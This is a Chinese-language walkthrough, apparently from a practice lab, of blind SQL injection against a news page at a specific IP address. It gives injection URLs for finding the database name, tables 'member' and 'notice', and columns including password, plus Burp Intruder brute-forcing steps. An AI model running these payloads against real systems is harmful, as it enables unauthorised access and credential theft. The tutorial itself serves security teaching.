**
一、报数据库名字
**
1.根据浮动的通告进度条,找到sql注入点。
内容不变,判断是数字型注入。
http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+
2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10
http://219.153.49.228:44199/new_list.php?id=1%20%20and%20%20length(database())=10%20--+
3.开始猜测数据库名字:
219.153.49.228:44199/new_list.php?id=1 and substr(database(),1,1)='s' --+
4.页面返回正常,在这里我们用burp工具进行爆破:
然后将其发送到Intercept模块,Intruder 是burp 套件的优势,他提供一组特别有用的功能。它可以自动实施各种定制攻击,包括资源枚举、数据提取、模糊测试等常见漏洞等。在各种有效的扫描工具中,它能够以最细化、最简单的方式访问它生产的请求与响应,允许组合利用个人智能与该工具的控制优点。
然后进入Intercept模块,
b
b
b,美元符号围起来的就是需要爆破的值:
Sniper 这种攻击模式可以让我们选择的攻击位置注入一个单一的有效载荷。这需要的有效载荷选项,将它们插入到选定的位置,然后重复,直到它已测试所有的有效载荷选项。如果选择多个位置,它会只适用于测试,一次一个位置。我会告诉你如何使用这个测试在几秒钟之内的SQL 漏洞的迹象
Pitchfork 这种攻击模式允许你测试多种有效载荷,最大能够自定义8 个,基于攻击位置。这种攻击模式设置不同的有效载荷为每个位置逐一同时测试。
Cluster bomb 这种攻击模式使用多种有效载荷,并允许你测试每一个可能有效载荷在每个选择的攻击位置,这意味着接下来的测试,交换任何其他有效载荷。当你有不同需要注射的地方,它将会非常的方便。
在这里我们使用52个字母字典,进行爆破:
我们修改substr函数。在这里介绍一下:
substr()函数:
Substr()和substring()函数实现的功能是一样的,均为截取字符串。
string substring(string, start, length)
string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。
Sql用例:
(1) substr(DATABASE(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。
(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。
爆出第二个字段:
由此类推了,推出数据库的名字为stormgroup。
**
二、爆出表名字
**
然后用new_list.php?id=1 and substr((select table_name from information_schema.tables where table_schema=‘stormgroup’ limit 0,1),1,1))=‘m’ --+,推出表名为member/notice
随后爆字段,new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+ 推出字段名字为name,password,status
http://219.153.49.228:44199/new_list.php?id=1%20and%20%20substr((select%20%20column_name%20from%20information_schema.columns%20where%20table_name=%22member%22%20limit%200,1),1,1)%20=%27n%27%20--+
爆字段内容,/new_list.php?id=1 and length((select concat(name) from stormgroup.member limit 1,1))=5 --+ ,先判断内容长度
/new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109,测试其内容。